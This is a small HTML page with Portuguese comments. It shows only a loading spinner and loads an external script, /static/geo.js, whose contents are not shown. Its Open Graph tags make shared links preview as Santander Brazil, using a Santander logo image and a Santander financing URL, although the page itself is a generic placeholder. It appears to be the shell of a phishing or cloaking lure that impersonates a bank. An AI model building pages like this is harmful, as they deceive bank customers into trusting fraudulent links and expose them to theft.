<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <!-- Metatags Open Graph -->
    <meta property="og:title" content="Título do Link">
    <meta property="og:description" content="Uma descrição breve do conteúdo que será visualizado quando o link for aberto.">
    <meta property="og:image" content="https://e7.pngegg.com/pngimages/237/279/png-clipart-santander-bank-santander-group-intermediary-banco-santander-bank-text-logo-thumbnail.png">
    <meta property="og:url" content="https://www.santander.com.br/hotsite/santanderfinanciamentos/">
    <title>Minha Página</title>
    
    <style>
        /* Estilos do spinner */
        .spinner {
            border: 16px solid #f3f3f3; /* Cor do fundo */
            border-top: 16px solid #3498db; /* Cor do topo */
            border-radius: 50%;
            width: 60px; /* Largura do spinner */
            height: 60px; /* Altura do spinner */
            animation: spin 2s linear infinite; /* Animação de rotação */
            margin: 0 auto; /* Centraliza o spinner */
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Estilo do container do carregamento */
        .loading-container {
            text-align: center; /* Centraliza o texto */
            margin-top: 20px; /* Espaçamento superior */
        }
    </style>

    <!-- Incluindo o arquivo JavaScript externo -->
    <script src="/static/geo.js" defer></script>
</head>
<body>
    
    <div class="loading-container">
        <div class="spinner"></div> <!-- Spinner de carregamento -->
       
    </div>
</body>
</html>
